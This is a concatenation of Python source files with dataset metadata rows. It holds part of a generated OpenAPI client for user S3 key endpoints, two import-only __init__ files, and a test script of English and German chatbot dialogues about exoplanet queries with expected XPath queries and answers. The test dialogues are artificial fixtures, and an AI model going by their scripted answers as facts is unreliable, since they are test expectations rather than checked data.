    for local_var_params_key, local_var_params_val in six.iteritems(local_var_params['kwargs']):
        if local_var_params_key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method um_users_s3keys_post" % local_var_params_key
            )
        local_var_params[local_var_params_key] = local_var_params_val
    del local_var_params['kwargs']
    # verify the required parameter 'user_id' is set
    if self.api_client.client_side_validation and ('user_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['user_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `user_id` when calling `um_users_s3keys_post`")  # noqa: E501
    # `depth` must lie within the documented range [0, 10]
    if self.api_client.client_side_validation and 'depth' in local_var_params and local_var_params['depth'] > 10:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `depth` when calling `um_users_s3keys_post`, must be a value less than or equal to `10`")  # noqa: E501
    if self.api_client.client_side_validation and 'depth' in local_var_params and local_var_params['depth'] < 0:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `depth` when calling `um_users_s3keys_post`, must be a value greater than or equal to `0`")  # noqa: E501
    collection_formats = {}
    # Path template substitution: {userId} in the URL.
    path_params = {}
    if 'user_id' in local_var_params:
        path_params['userId'] = local_var_params['user_id']  # noqa: E501
    # Start from any caller-supplied raw query params, then append the
    # operation's own optional query parameters when provided.
    query_params = list(local_var_params.get('query_params', {}).items())
    if 'pretty' in local_var_params and local_var_params['pretty'] is not None:  # noqa: E501
        query_params.append(('pretty', local_var_params['pretty']))  # noqa: E501
    if 'depth' in local_var_params and local_var_params['depth'] is not None:  # noqa: E501
        query_params.append(('depth', local_var_params['depth']))  # noqa: E501
    header_params = {}
    if 'x_contract_number' in local_var_params:
        header_params['X-Contract-Number'] = local_var_params['x_contract_number']  # noqa: E501
    form_params = []
    local_var_files = {}
    # This POST sends no request body (the key material is server-generated).
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = ['Basic Authentication', 'Token Authentication']  # noqa: E501
    # Allow callers to override the deserialization target type.
    response_type = 'S3Key'
    if 'response_type' in kwargs:
        response_type = kwargs['response_type']
    return self.api_client.call_api(
        '/um/users/{userId}/s3keys', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=response_type,  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
def um_users_s3keys_put(self, user_id, key_id, s3_key, **kwargs):  # noqa: E501
    """Modify S3 keys by key ID  # noqa: E501

    Enable or disable the specified user S3 key.  # noqa: E501

    The request is synchronous by default; pass ``async_req=True`` to run it
    asynchronously and receive a thread instead:

    >>> thread = api.um_users_s3keys_put(user_id, key_id, s3_key, async_req=True)
    >>> result = thread.get()

    :param user_id: The unique ID of the user. (required)
    :type user_id: str
    :param key_id: The unique ID of the S3 key. (required)
    :type key_id: str
    :param s3_key: The modified S3 key. (required)
    :type s3_key: S3Key
    :param pretty: Controls whether the response is pretty-printed (with indentations and new lines).
    :type pretty: bool
    :param depth: Controls the detail depth of the response objects. GET /datacenters/[ID] - depth=0: Only direct properties are included; children (servers and other elements) are not included. - depth=1: Direct properties and children references are included. - depth=2: Direct properties and children properties are included. - depth=3: Direct properties and children properties and children's children are included. - depth=... and so on
    :type depth: int
    :param x_contract_number: Users with multiple contracts must provide the contract number, for which all API requests are to be executed.
    :type x_contract_number: int
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: S3Key
    """
    # Convenience wrapper: delegate to the *_with_http_info variant while
    # forcing `_return_http_data_only`, so callers get the deserialized body
    # without the status code and headers.
    call_kwargs = dict(kwargs)
    call_kwargs['_return_http_data_only'] = True
    return self.um_users_s3keys_put_with_http_info(user_id, key_id, s3_key, **call_kwargs)  # noqa: E501
def um_users_s3keys_put_with_http_info(self, user_id, key_id, s3_key, **kwargs):  # noqa: E501
    """Modify S3 keys by key ID  # noqa: E501

    Enable or disable the specified user S3 key.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.um_users_s3keys_put_with_http_info(user_id, key_id, s3_key, async_req=True)
    >>> result = thread.get()

    :param user_id: The unique ID of the user. (required)
    :type user_id: str
    :param key_id: The unique ID of the S3 key. (required)
    :type key_id: str
    :param s3_key: The modified S3 key. (required)
    :type s3_key: S3Key
    :param pretty: Controls whether the response is pretty-printed (with indentations and new lines).
    :type pretty: bool
    :param depth: Controls the detail depth of the response objects. GET /datacenters/[ID] - depth=0: Only direct properties are included; children (servers and other elements) are not included. - depth=1: Direct properties and children references are included. - depth=2: Direct properties and children properties are included. - depth=3: Direct properties and children properties and children's children are included. - depth=... and so on
    :type depth: int
    :param x_contract_number: Users with multiple contracts must provide the contract number, for which all API requests are to be executed.
    :type x_contract_number: int
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :param _request_auth: set to override the auth_settings for a single
                          request; this effectively ignores the authentication
                          in the spec for a single request.
    :type _request_auth: dict, optional
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: tuple(S3Key, status_code(int), headers(HTTPHeaderDict))
    """
    # NOTE: locals() is captured before any other local is bound, so it holds
    # exactly `self`, the three named parameters and the raw `kwargs` dict;
    # accepted keyword arguments are merged into it below.
    local_var_params = locals()
    # Parameters defined by the API spec for this operation.
    all_params = [
        'user_id',
        'key_id',
        's3_key',
        'pretty',
        'depth',
        'x_contract_number'
    ]
    # Framework-level options accepted by every operation.
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout',
            '_request_auth',
            'response_type',
            'query_params'
        ]
    )
    # Reject unknown keyword arguments early, then flatten the accepted ones
    # into local_var_params and drop the nested kwargs dict.
    for local_var_params_key, local_var_params_val in six.iteritems(local_var_params['kwargs']):
        if local_var_params_key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method um_users_s3keys_put" % local_var_params_key
            )
        local_var_params[local_var_params_key] = local_var_params_val
    del local_var_params['kwargs']
    # verify the required parameter 'user_id' is set
    if self.api_client.client_side_validation and ('user_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['user_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `user_id` when calling `um_users_s3keys_put`")  # noqa: E501
    # verify the required parameter 'key_id' is set
    if self.api_client.client_side_validation and ('key_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['key_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `key_id` when calling `um_users_s3keys_put`")  # noqa: E501
    # verify the required parameter 's3_key' is set
    if self.api_client.client_side_validation and ('s3_key' not in local_var_params or  # noqa: E501
                                                   local_var_params['s3_key'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `s3_key` when calling `um_users_s3keys_put`")  # noqa: E501
    # `depth` must lie within the documented range [0, 10]
    if self.api_client.client_side_validation and 'depth' in local_var_params and local_var_params['depth'] > 10:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `depth` when calling `um_users_s3keys_put`, must be a value less than or equal to `10`")  # noqa: E501
    if self.api_client.client_side_validation and 'depth' in local_var_params and local_var_params['depth'] < 0:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `depth` when calling `um_users_s3keys_put`, must be a value greater than or equal to `0`")  # noqa: E501
    collection_formats = {}
    # Path template substitution: {userId} and {keyId} in the URL.
    path_params = {}
    if 'user_id' in local_var_params:
        path_params['userId'] = local_var_params['user_id']  # noqa: E501
    if 'key_id' in local_var_params:
        path_params['keyId'] = local_var_params['key_id']  # noqa: E501
    # Start from any caller-supplied raw query params, then append the
    # operation's own optional query parameters when provided.
    query_params = list(local_var_params.get('query_params', {}).items())
    if 'pretty' in local_var_params and local_var_params['pretty'] is not None:  # noqa: E501
        query_params.append(('pretty', local_var_params['pretty']))  # noqa: E501
    if 'depth' in local_var_params and local_var_params['depth'] is not None:  # noqa: E501
        query_params.append(('depth', local_var_params['depth']))  # noqa: E501
    header_params = {}
    if 'x_contract_number' in local_var_params:
        header_params['X-Contract-Number'] = local_var_params['x_contract_number']  # noqa: E501
    form_params = []
    local_var_files = {}
    # The modified S3Key object is serialized as the PUT request body.
    body_params = None
    if 's3_key' in local_var_params:
        body_params = local_var_params['s3_key']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = ['Basic Authentication', 'Token Authentication']  # noqa: E501
    # Allow callers to override the deserialization target type.
    response_type = 'S3Key'
    if 'response_type' in kwargs:
        response_type = kwargs['response_type']
    return self.api_client.call_api(
        '/um/users/{userId}/s3keys/{keyId}', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=response_type,  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
def um_users_s3ssourl_get(self, user_id, **kwargs):  # noqa: E501
    """Retrieve S3 single sign-on URLs  # noqa: E501

    Retrieve S3 Object Storage single sign-on URLs for the specified user.
    The user ID is in the response body when the user is created, and in the
    list of the users, returned by GET.  # noqa: E501

    The request is synchronous by default; pass ``async_req=True`` to run it
    asynchronously and receive a thread instead:

    >>> thread = api.um_users_s3ssourl_get(user_id, async_req=True)
    >>> result = thread.get()

    :param user_id: The unique ID of the user. (required)
    :type user_id: str
    :param pretty: Controls whether the response is pretty-printed (with indentations and new lines).
    :type pretty: bool
    :param x_contract_number: Users with multiple contracts must provide the contract number, for which all API requests are to be executed.
    :type x_contract_number: int
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: S3ObjectStorageSSO
    """
    # Convenience wrapper: delegate to the *_with_http_info variant while
    # forcing `_return_http_data_only`, so callers get the deserialized body
    # without the status code and headers.
    call_kwargs = dict(kwargs)
    call_kwargs['_return_http_data_only'] = True
    return self.um_users_s3ssourl_get_with_http_info(user_id, **call_kwargs)  # noqa: E501
def um_users_s3ssourl_get_with_http_info(self, user_id, **kwargs):  # noqa: E501
    """Retrieve S3 single sign-on URLs  # noqa: E501

    Retrieve S3 Object Storage single sign-on URLs for the specified user.
    The user ID is in the response body when the user is created, and in the
    list of the users, returned by GET.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.um_users_s3ssourl_get_with_http_info(user_id, async_req=True)
    >>> result = thread.get()

    :param user_id: The unique ID of the user. (required)
    :type user_id: str
    :param pretty: Controls whether the response is pretty-printed (with indentations and new lines).
    :type pretty: bool
    :param x_contract_number: Users with multiple contracts must provide the contract number, for which all API requests are to be executed.
    :type x_contract_number: int
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :param _request_auth: set to override the auth_settings for a single
                          request; this effectively ignores the authentication
                          in the spec for a single request.
    :type _request_auth: dict, optional
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: tuple(S3ObjectStorageSSO, status_code(int), headers(HTTPHeaderDict))
    """
    # NOTE: locals() is captured before any other local is bound, so it holds
    # exactly `self`, `user_id` and the raw `kwargs` dict; accepted keyword
    # arguments are merged into it below.
    local_var_params = locals()
    # Parameters defined by the API spec for this operation.
    all_params = [
        'user_id',
        'pretty',
        'x_contract_number'
    ]
    # Framework-level options accepted by every operation.
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout',
            '_request_auth',
            'response_type',
            'query_params'
        ]
    )
    # Reject unknown keyword arguments early, then flatten the accepted ones
    # into local_var_params and drop the nested kwargs dict.
    for local_var_params_key, local_var_params_val in six.iteritems(local_var_params['kwargs']):
        if local_var_params_key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method um_users_s3ssourl_get" % local_var_params_key
            )
        local_var_params[local_var_params_key] = local_var_params_val
    del local_var_params['kwargs']
    # verify the required parameter 'user_id' is set
    if self.api_client.client_side_validation and ('user_id' not in local_var_params or  # noqa: E501
                                                   local_var_params['user_id'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `user_id` when calling `um_users_s3ssourl_get`")  # noqa: E501
    collection_formats = {}
    # Path template substitution: {userId} in the URL.
    path_params = {}
    if 'user_id' in local_var_params:
        path_params['userId'] = local_var_params['user_id']  # noqa: E501
    # Start from any caller-supplied raw query params, then append the
    # operation's own optional query parameters when provided.
    query_params = list(local_var_params.get('query_params', {}).items())
    if 'pretty' in local_var_params and local_var_params['pretty'] is not None:  # noqa: E501
        query_params.append(('pretty', local_var_params['pretty']))  # noqa: E501
    header_params = {}
    if 'x_contract_number' in local_var_params:
        header_params['X-Contract-Number'] = local_var_params['x_contract_number']  # noqa: E501
    form_params = []
    local_var_files = {}
    # GET request: no body is sent.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = ['Basic Authentication', 'Token Authentication']  # noqa: E501
    # Allow callers to override the deserialization target type.
    response_type = 'S3ObjectStorageSSO'
    if 'response_type' in kwargs:
        response_type = kwargs['response_type']
    return self.api_client.call_api(
        '/um/users/{userId}/s3ssourl', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=response_type,  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
| 55.364786
| 451
| 0.6308
| 7,135
| 56,915
| 4.793553
| 0.031815
| 0.049822
| 0.082276
| 0.021987
| 0.985644
| 0.982837
| 0.982486
| 0.980908
| 0.979446
| 0.977984
| 0
| 0.017122
| 0.297075
| 56,915
| 1,027
| 452
| 55.418695
| 0.837778
| 0.492278
| 0
| 0.785714
| 0
| 0.021008
| 0.22361
| 0.044464
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027311
| false
| 0
| 0.010504
| 0
| 0.065126
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e878330a2e6fbecc53a274ff3c0a08fbec745cc6
| 188
|
py
|
Python
|
animalai/animalai/communicator_objects/__init__.py
|
southpawac/AnimalAI-Olympics
|
efa08a78b2ddad27260c160323a0b20541c13c29
|
[
"Apache-2.0"
] | 607
|
2019-04-30T21:10:58.000Z
|
2022-03-03T16:36:54.000Z
|
animalai/animalai/communicator_objects/__init__.py
|
KacperKazan/AnimalAI-Olympics
|
c2742dc7344e3907980cf7f1b4fabb1ab09c7062
|
[
"Apache-2.0"
] | 75
|
2019-05-02T10:26:28.000Z
|
2022-02-07T03:02:44.000Z
|
animalai/animalai/communicator_objects/__init__.py
|
KacperKazan/AnimalAI-Olympics
|
c2742dc7344e3907980cf7f1b4fabb1ab09c7062
|
[
"Apache-2.0"
] | 109
|
2019-05-01T10:29:35.000Z
|
2022-03-30T07:22:05.000Z
|
from .arenas_configurations_proto_pb2 import *
from .arena_configuration_proto_pb2 import *
from .items_to_spawn_proto_pb2 import *
from .vector_proto_pb2 import *
from .__init__ import *
| 31.333333
| 46
| 0.840426
| 27
| 188
| 5.259259
| 0.481481
| 0.225352
| 0.394366
| 0.507042
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02381
| 0.106383
| 188
| 5
| 47
| 37.6
| 0.821429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e8875795a944b95f9c569bd8cf96341f70c22d0e
| 159
|
py
|
Python
|
doubling_agent/__init__.py
|
lkmartin90/doubling_agent
|
73a7f06aa43c5fa51ea1263b72ebe6f8319bf894
|
[
"MIT"
] | 1
|
2020-12-03T15:47:24.000Z
|
2020-12-03T15:47:24.000Z
|
doubling_agent/__init__.py
|
lkmartin90/doubling_agent
|
73a7f06aa43c5fa51ea1263b72ebe6f8319bf894
|
[
"MIT"
] | null | null | null |
doubling_agent/__init__.py
|
lkmartin90/doubling_agent
|
73a7f06aa43c5fa51ea1263b72ebe6f8319bf894
|
[
"MIT"
] | null | null | null |
from . import basic_functions
from . import motility_functions
from . import common_functions
from . import steve_functions
from . import image_steve_functions
| 31.8
| 35
| 0.849057
| 21
| 159
| 6.142857
| 0.380952
| 0.387597
| 0.589147
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119497
| 159
| 5
| 35
| 31.8
| 0.921429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2cd416b9ef923fdba3d5a3f00e1f04b39c65fe64
| 15,447
|
py
|
Python
|
dff_space_skill/run_test.py
|
SaschaC/mds_skills_hackathon
|
baf8e76adf8e766299dac8c89e41b63a955ef2c1
|
[
"Apache-2.0"
] | null | null | null |
dff_space_skill/run_test.py
|
SaschaC/mds_skills_hackathon
|
baf8e76adf8e766299dac8c89e41b63a955ef2c1
|
[
"Apache-2.0"
] | null | null | null |
dff_space_skill/run_test.py
|
SaschaC/mds_skills_hackathon
|
baf8e76adf8e766299dac8c89e41b63a955ef2c1
|
[
"Apache-2.0"
] | null | null | null |
import random
from scenario.main import actor
import run_interactive
random.seed(314)
# testing
test_set = [
[("hi", "Please enter your search query!"),
("planets with a radius of at most 0.05","""
Normalized NL Query: planets with a radius of at most #num0
XML Queries:['(.//planet[radius<=0.05])[position()<=count(//*)]']
I found the following 13 planets for the query 'planets with a radius of at most 0.05':
Kepler-102 b, KOI-115.03, Kepler-1308 b, Kepler-37 b, Kepler-444 b, Kepler-444 c, Kepler-444 d, Kepler-444 e, Kepler-62 c, Kepler-138 b, Mercury, Mars, Pluto
Would you like more info on one of these planets?
"""
),
("yes", "Alright, for which planet?"),
("KOI-115.03","\n\nKOI-115.03 is an unconfirmed transiting planet orbiting Kepler-105.\n\nWould you like to try another search?\n"),
("no","OK bye!")
],
[("hi", "Please enter your search query!"),("Are there any planets with a radius of at most 0.05?","""
Normalized NL Query: planets with a radius of at most #num0
XML Queries:['(.//planet[radius<=0.05])[position()<=count(//*)]']
I found the following 13 planets for the query 'Are there any planets with a radius of at most 0.05?':
Kepler-102 b, KOI-115.03, Kepler-1308 b, Kepler-37 b, Kepler-444 b, Kepler-444 c, Kepler-444 d, Kepler-444 e, Kepler-62 c, Kepler-138 b, Mercury, Mars, Pluto
Would you like more info on one of these planets?
"""
),
("no", "Would you like to try another search?"),
("no","OK bye!")],
[("hi", "Please enter your search query!"),("Which planets have a radius of at most 0.05?","""
Normalized NL Query: which planets have a radius of at most #num0
XML Queries:['.//planet[radius<=0.05]']
I found the following 13 planets for the query 'Which planets have a radius of at most 0.05?':
Kepler-102 b, KOI-115.03, Kepler-1308 b, Kepler-37 b, Kepler-444 b, Kepler-444 c, Kepler-444 d, Kepler-444 e, Kepler-62 c, Kepler-138 b, Mercury, Mars, Pluto
Would you like more info on one of these planets?
"""
),
("no", "Would you like to try another search?"),
("no","OK bye!")],
[("hi", "Please enter your search query!"),("show me 2 planets with a radius below 0.05","""
Normalized NL Query: #num0 planets with a radius below #num1
XML Queries:['(.//planet[radius<=0.05])[position()<=2]']
I found the following 2 planets for the query 'show me 2 planets with a radius below 0.05':
Kepler-102 b, KOI-115.03
Would you like more info on one of these planets?
"""
),
("no", "Would you like to try another search?"),
("no","OK bye!")],
[("hi", "Please enter your search query!"),("show me 3 planets with a radius of at least 1 and a mass of at most 5 that were discovered before 2020","""
Normalized NL Query: #num0 planets with a radius of at least #num1 and a mass of at most #num2 that were discovered before #num3
XML Queries:['(.//planet[radius>=1 and mass<=5 and discoveryyear<=2020])[position()<=3]']
I found the following 3 planets for the query 'show me 3 planets with a radius of at least 1 and a mass of at most 5 that were discovered before 2020':
51 Eri b, CoRoT-11 b, CoRoT-12 b
Would you like more info on one of these planets?
"""
),
("yes", "Alright, for which planet?"),
("51 Eri b","""
51 Eri b is a directly-imaged exoplanet located at a projected separation of 13.2 AU from its star. The system also exhibits an infrared excess indicating the presence of debris belts at around 5.5 AU and 82 AU from the star. It is a member of the Beta Pictoris moving group.
Would you like to try another search?
"""), ("no","OK bye!")],
[("hi", "Please enter your search query!"),("Show me 1 planet with an age of maximally 0.1 and a mass of at least 1 that was discovered in 2020 and 3 planets that have a radius of at least 1",
"""
Normalized NL Query: #num0 planet with an age of maximally #num1 and a mass of at least #num2 that was discovered in #num3 and #num4 planets that have a radius of at least #num5
XML Queries:['(.//planet[age<=0.1 and mass>=1 and discoveryyear=2020])[position()<=1]', '(.//planet[radius>=1])[position()<=3]']
I did not find any planet for part 1 of the query 'Show me 1 planet with an age of maximally 0.1 and a mass of at least 1 that was discovered in 2020 and 3 planets that have a radius of at least 1'.
Here are 3 planets I found for part 2 of the query 'Show me 1 planet with an age of maximally 0.1 and a mass of at least 1 that was discovered in 2020 and 3 planets that have a radius of at least 1':
1RXS1609 b, 2M 2206-20 b, 2MASS J0219-3925 B
Would you like more info on one of these planets?
"""
),
("no", "Would you like to try another search?"),
("no","OK bye!")],
[("hi", "Please enter your search query!"),("Show me 3 planets that were discovered before 2020 and that have a mass of at least 2 with an age of maximally 5.",
"""
Normalized NL Query: #num0 planets that were discovered before #num1 and that have a mass of at least #num2 with an age of maximally #num3
XML Queries:['(.//planet[discoveryyear<=2020 and mass>=2][age<=5.])[position()<=3]']
I found the following 3 planets for the query 'Show me 3 planets that were discovered before 2020 and that have a mass of at least 2 with an age of maximally 5.':
HD 100546 b, SDSS J1110+0116, SIMP0136+0933
Would you like more info on one of these planets?
"""
),
("no", "Would you like to try another search?"),
("no","OK bye!")],
[("hi", "Please enter your search query!"),("which planets have a mass of 1 and which planets were discovered before 2001 and which planets have a mass of 1 and were discovered before 2001?",
"""
Normalized NL Query: which planets have a mass of #num0 and which planets were discovered before #num1 and which planets have a mass of #num2 and were discovered before #num3
XML Queries:['.//planet[mass=1]', './/planet[discoveryyear<=2001]', './/planet[mass=1 and discoveryyear<=2001]']
Here are 6 planets I found for part 1 of the query 'which planets have a mass of 1 and which planets were discovered before 2001 and which planets have a mass of 1 and were discovered before 2001?':
HD 219415 b, HD 75784 b, Kepler-44 b, Jupiter, WASP-129 b, WASP-190 b
Here are 66 planets I found for part 2 of the query 'which planets have a mass of 1 and which planets were discovered before 2001 and which planets have a mass of 1 and were discovered before 2001?':
16 Cygni B b, 47 UMa b, 47 UMa c, 51 Peg b, 55 Cancri b, 70 Vir b, BD-10 3166 b, eps Eridani b, Gliese 3021 A b, Gliese 86 b, Gliese 876 b, Gliese 876 c, HD 10697 b, HD 114762 b, HD 114783 b, HD 12661 b, HD 130322 b, HD 134987 b, HD 142 A b, HD 16141 A b, HD 168443 b, HD 168443 c, HD 169830 b, HD 177830 A b, HD 178911 B b, HD 179949 b, HD 187123 b, HD 192263 b, HD 195019 A b, HD 19994 A b, HD 209458 b, HD 210277 b, HD 213240 A b, HD 217107 b, HD 222582 A b, HD 23079 b, HD 27442 A b, HD 28185 b, HD 37124 b, HD 38529 A b, HD 39091 b, HD 4203 b, HD 4208 b, HD 46375 A b, HD 52265 b, HD 6434 b, HD 68988 b, HD 75289 A b, HD 80606 b, HD 89744 A b, HD 92788 b, HR 810 b, ITG 15B, mu Arae b, PSR 1257+12 A, PSR 1257+12 B, PSR 1257+12 C, PSR B1620-26 b, Rho Coronae Borealis b, Uranus, Neptune, Pluto, tau Boo A b, Upsilon Andromedae A b, Upsilon Andromedae A c, Upsilon Andromedae A d
I did not find any planet for part 3 of the query 'which planets have a mass of 1 and which planets were discovered before 2001 and which planets have a mass of 1 and were discovered before 2001?'.
Would you like more info on one of these planets?
"""
),
("no", "Would you like to try another search?"),
("no","OK bye!")],
[("hi", "Please enter your search query!"),
("Planeten mit einem Radius von maximal 0.05","""
Normalized NL Query: planeten mit einem radius von maximal #num0
XML Queries:['(.//planet[radius<=0.05])[position()<=count(//*)]']
Ich habe die folgenden 13 Planeten gefunden für die Anfrage 'Planeten mit einem Radius von maximal 0.05:'
Kepler-102 b, KOI-115.03, Kepler-1308 b, Kepler-37 b, Kepler-444 b, Kepler-444 c, Kepler-444 d, Kepler-444 e, Kepler-62 c, Kepler-138 b, Mercury, Mars, Pluto
Möchtest du mehr über einen dieser Planeten erfahren?
"""
),
("nein", "Möchtest du eine neue Suche starten?"),
("nein","OK bye!")
],
[("hi", "Bitte gib deine Anfrage ein."),
("Gibt es Planeten mit einem Radius von maximal 0.05?","""
Normalized NL Query: planeten mit einem radius von maximal #num0
XML Queries:['(.//planet[radius<=0.05])[position()<=count(//*)]']
Ich habe die folgenden 13 Planeten gefunden für die Anfrage 'Gibt es Planeten mit einem Radius von maximal 0.05?:'
Kepler-102 b, KOI-115.03, Kepler-1308 b, Kepler-37 b, Kepler-444 b, Kepler-444 c, Kepler-444 d, Kepler-444 e, Kepler-62 c, Kepler-138 b, Mercury, Mars, Pluto
Möchtest du mehr über einen dieser Planeten erfahren?
"""
),
("nein", "Möchtest du eine neue Suche starten?"),
("nein","OK bye!")
],
[("hi", "Bitte gib deine Anfrage ein."),
("Gibt es Planeten mit einem Radius von maximal 0.05?","""
Normalized NL Query: planeten mit einem radius von maximal #num0
XML Queries:['(.//planet[radius<=0.05])[position()<=count(//*)]']
Ich habe die folgenden 13 Planeten gefunden für die Anfrage 'Gibt es Planeten mit einem Radius von maximal 0.05?:'
Kepler-102 b, KOI-115.03, Kepler-1308 b, Kepler-37 b, Kepler-444 b, Kepler-444 c, Kepler-444 d, Kepler-444 e, Kepler-62 c, Kepler-138 b, Mercury, Mars, Pluto
Möchtest du mehr über einen dieser Planeten erfahren?
"""
),
("nein", "Möchtest du eine neue Suche starten?"),
("nein","OK bye!")
],
[("hi", "Bitte gib deine Anfrage ein."),
("Welche Planeten haben einen Radius von unter 0.05?","""
Normalized NL Query: welche planeten haben einen radius von unter #num0
XML Queries:['.//planet[radius<=0.05]']
Ich habe die folgenden 13 Planeten gefunden für die Anfrage 'Welche Planeten haben einen Radius von unter 0.05?:'
Kepler-102 b, KOI-115.03, Kepler-1308 b, Kepler-37 b, Kepler-444 b, Kepler-444 c, Kepler-444 d, Kepler-444 e, Kepler-62 c, Kepler-138 b, Mercury, Mars, Pluto
Möchtest du mehr über einen dieser Planeten erfahren?
"""
),
("nein", "Möchtest du eine neue Suche starten?"),
("nein","OK bye!")
],
[("hi", "Bitte gib deine Anfrage ein."),
("Zeig mir 2 Planeten mit einem Radius von weniger als 0.05","""
Normalized NL Query: #num0 planeten mit einem radius von weniger als #num1
XML Queries:['(.//planet[radius<=0.05])[position()<=2]']
